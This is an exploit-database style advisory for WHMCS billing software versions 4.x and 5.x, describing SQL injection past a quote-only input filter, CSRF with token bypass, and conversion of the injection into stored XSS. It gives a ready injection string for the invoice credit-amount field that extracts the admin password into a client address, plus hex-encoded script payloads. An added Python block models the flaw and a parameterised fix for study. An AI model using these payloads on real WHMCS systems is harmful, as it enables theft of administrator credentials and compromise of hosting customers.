WHMCS 4.x & 5.x – Multiple Web Vulnerabilities

# Exploit Title: WHMCS v4.x & v5.x – Multiple Web Vulnerabilities
# Date: 2013-12-10
# Exploit Author: ahwak2000
# Vendor Homepage: http://whmcs.com/
# Version: 4.x , 5.x
# Tested on: win 7

+---------------+
| Vulnerability |
+---------------+

+-------------+
| Description |
+-------------+

The script uses this function to secure its input.
The function only disables ' and ",
but we can bypass it if the query does not use '.
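
Added example, not part of the original advisory and not WHMCS code: a Python/sqlite3 model of why a filter that handles only ' and " fails when input lands in an unquoted numeric position, next to a hardened version that validates the amount and binds parameters. The schema, function names and stored value are constructed for illustration; the test input is the amount string given under Example 2.

```python
import re
import sqlite3

def quote_only_escape(value):
    # Constructed stand-in for a filter that neutralises only ' and ".
    return value.replace("'", "''").replace('"', '""')

def make_db():
    # Constructed schema and data; only the table/column names echo the advisory.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tbladmins (password TEXT);
        CREATE TABLE tblclients (id INTEGER PRIMARY KEY, credit NUMERIC, address2 TEXT);
        INSERT INTO tbladmins VALUES ('constructed-admin-hash');
        INSERT INTO tblclients VALUES (1, 10, '');
    """)
    return db

def apply_credit_unsafe(db, client_id, amount):
    # "Before": filtered input is concatenated into an unquoted numeric slot,
    # so SQL syntax that contains no quote characters passes straight through.
    db.execute("UPDATE tblclients SET credit = credit - " + quote_only_escape(amount)
               + " WHERE id = " + str(int(client_id)))

def apply_credit_safe(db, client_id, amount):
    # "After": allow-list the numeric format, then bind values as parameters.
    if not re.fullmatch(r"[0-9]{1,8}(\.[0-9]{1,2})?", amount):
        raise ValueError("amount must be a plain decimal number")
    db.execute("UPDATE tblclients SET credit = credit - ? WHERE id = ?",
               (float(amount), int(client_id)))

def client_row(db, client_id):
    return db.execute("SELECT credit, address2 FROM tblclients WHERE id = ?",
                      (client_id,)).fetchone()

def demo():
    # Amount string as given under Example 2 of this advisory.
    page_input = "0.01,Address2=(SELECT password from tbladmins limit 0,1)"
    db = make_db()
    apply_credit_unsafe(db, 1, page_input)
    unsafe_row = client_row(db, 1)
    db = make_db()
    try:
        apply_credit_safe(db, 1, page_input)
        rejected = False
    except ValueError:
        rejected = True
    apply_credit_safe(db, 1, "0.01")
    return unsafe_row, rejected, client_row(db, 1)

if __name__ == "__main__":
    print(demo())
```
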

+---------+
| Example |
+---------+

file : admin/invoices.php

+------------+
|Exploitation|
+------------+

CSRF to SQL And Bypass Token

OR

+-----------+
| Example 2 |
+-----------+

file : includes/invoicefunctions.php

+------------+
|Exploitation|
+------------+
Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1 <~ edit

If the client has credit and wants to pay with credit, in the "Enter the amount to apply:" field put:

0.01,Address2=(SELECT password from tbladmins limit 0,1)

The admin password will be in the client address.

+------------+
| sql => xss |
+------------+

The SQL injection can be converted to XSS.
The XSS must be encoded to hex.
Example:

(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)

The SQL can be modified to work on all members and supervisors:

(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~

+-------------------+
./END
